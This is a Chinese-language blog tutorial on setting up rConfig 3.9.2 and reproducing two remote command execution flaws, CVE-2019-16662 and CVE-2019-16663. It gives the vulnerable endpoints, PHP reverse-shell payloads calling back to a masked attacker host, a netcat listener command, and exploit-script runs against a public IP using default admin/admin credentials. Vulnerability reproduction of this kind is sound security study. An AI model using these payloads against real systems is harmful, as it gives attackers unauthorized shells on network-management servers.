今天就跟大家聊聊有关如何进行rConfig-CVE漏洞复现及环境搭建,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。
rConfig是一个开放源代码的网络设备配置管理实用程序,网络工程师可以使用它来频繁获取其网络设备的配置快照。rConfig是唯一的,因为您选择要针对设备运行的命令。
只需使用要应用于设备类别的命令列表配置rConfig,然后将设备添加到该类别。创建一个计划任务,其余工作由rConfig完成。现在,rConfig版本3具有配置符合性管理实用程序,使您可以监视设备配置以符合策略。
一、环境搭建
rConfig安装
cd /home
curl -O https://www.rconfig.com/downloads/scripts/install_rConfig.sh -A "Mozilla"
chmod +x install_rConfig.sh
./install_rConfig.sh
运行文件安装发现报错 我们打开源码看看为什么连接不上
结果发现会curl访问一下谷歌来判断是否有网 我们可以直接改成www.baidu.com,但是后面安装可能会刚问一写被墙的连接,所以我们保险起见,挂个代理把!!!我这里用的是proxychains4代理的我内网的一个ss。
然后就可以直接正常安装了。
安装完成之后会有一个centos7_postReboot.sh文件
我们接着运行一下 就可以看见已经安装完成了。剩下就去web页面配置了。
进入https://192.168.157.130/install页面进行后续安装
到此安装均已完成,默认账号密码为admin admin。
二、漏洞复现
rConfig 3.9.2及更低版本中的未经身份验证的命令执行漏洞。安装后,安装目录不会自动删除,这允许未经身份验证的用户通过ajaxServerSettingsChk.php文件作为Web服务器用户执行任意命令。
CVE-2019-16662 rConfig3.9.2远程命令执行漏洞复现:
为了直观,我自己在服务器上搭建了一个rConfig3.9.2系统,现在我们来抓包复现一下漏洞
我们将路径替换成存在漏的/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=
下面我们需要将命令执行一道url编码 然后再填入参数即可。
已经输出了我们的回显,现在我们来弹个shell试一下
将url编码;php -r '$sock=fsockopen("XX.XX.XX.XX",6633);exec("/bin/sh -i <&3 >&3 2>&3");'#
另一个外网服务器进行监听 nc -lvnp 6633
添加参数发送请求,可以看到已经反弹到shell了。
CVE-2019-16662Exp脚本利用
python rConfig-CVE-2019-16662.py https://154.221.20.69 XX.XX.XX.XX 6634
CVE-2019-16663 rConfig3.9.2远程命令执行漏洞复现
这个RCE需要身份验证才能执行,存在lib/crud/search.crud.php这个文件里。
登录成功之后进行抓包 替换成RCE的路径 将反弹shell的payload进行编码
""&&php -r '$sock=fsockopen("XX.XX.XX.XX",6635);exec("/bin/sh -i <&3 >&3 2>&3");'#
监听,反弹,成功
CVE-2019-16663 EXP利用
python rConfig-CVE-2019-16663.py https://154.221.20.69 admin admin IP 6636
CVE-2019-19509 rConfig3.9.3远程命令执行漏洞
由于3.9.3的安装包被官方删除和下架了,现在无法复现,但网上已有Exp。
看完上述内容,你们对如何进行rConfig-CVE漏洞复现及环境搭建有进一步的了解吗?如果还想了解更多知识或者相关内容,请关注亿速云行业资讯频道,感谢大家的支持。
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。